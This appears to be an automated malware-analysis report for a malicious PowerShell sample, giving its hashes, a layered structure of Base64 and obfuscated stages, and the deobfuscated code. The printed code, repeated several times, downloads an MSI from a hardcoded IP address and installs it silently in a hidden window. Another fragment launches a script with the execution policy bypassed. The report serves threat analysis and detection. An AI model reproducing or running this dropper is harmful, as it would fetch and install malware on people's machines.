Malicious
Malicious

5be136aab88d8104b83d1e4a603ebe8d

PowerShell
|
MD5: 5be136aab88d8104b83d1e4a603ebe8d
|
Size: 37.19 KB
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
5be136aab88d8104b83d1e4a603ebe8d
Sha1
ce474e06a90a28154e2a10ca5fb25f3e2baadca0
Sha256
082c873061fdb6a9a7e94f24631b2b9aa8fcc5efa6005ccab81497c84d9002ed
Sha384
f3be54850153b426a6aae7727b48b59c7293653dbe5f1799090f120729364dde8dfac41c4541f3edb05efc542f80cb2c
Sha512
33cb15bf01f66d937d5a7096904b2f609b006d518ac1c45ae5b121515a1f24de854ff83ada4559eb3ac54bca8c85fe575824050819f87a41e4a7341fc8c3f6f6
SSDeep
384:sVe7EEZbOFAmHeeR/CWimKFVrX1BUg+KOcdezeIQ4r2VPbpDS+KNcgUMPUW06jwf:L72AGhdinLXIgLOctS+jpDSTcG8W18
TLSH
1DF2323966D7E84293A43E04C4A6F85965A423B157FBCC5CF3CC9BBDB081E611B542EC
File Structure
5be136aab88d8104b83d1e4a603ebe8d
Malicious
[Base64-Block]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i "$filePath" /qn /norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" }

Deobfuscated PowerShell

-argumentlist "-NoProfile -ExecutionPolicy Bypass -File "$tempScript"" exit
Deobfuscated PowerShell

$ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath /qn /norestart -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" }

Deobfuscated PowerShell

$ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" }

Deobfuscated PowerShell

$ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" }

5be136aab88d8104b83d1e4a603ebe8d (37.19 KB)
File Structure
5be136aab88d8104b83d1e4a603ebe8d
Malicious
[Base64-Block]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

$ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i "$filePath" /qn /norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" }

Malicious

5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [Base64-Block]
Deobfuscated PowerShell

-argumentlist "-NoProfile -ExecutionPolicy Bypass -File "$tempScript"" exit

Malicious

5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [PowerShell Command]
Deobfuscated PowerShell

$ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath /qn /norestart -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" }

Malicious

5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [Base64-Block] > [Deobfuscated PS]
Deobfuscated PowerShell

$ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" }

Malicious

5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [Base64-Block] > [Deobfuscated PS] > [Deobfuscated PS]
Deobfuscated PowerShell

$ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" }

Malicious

5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [Base64-Block] > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙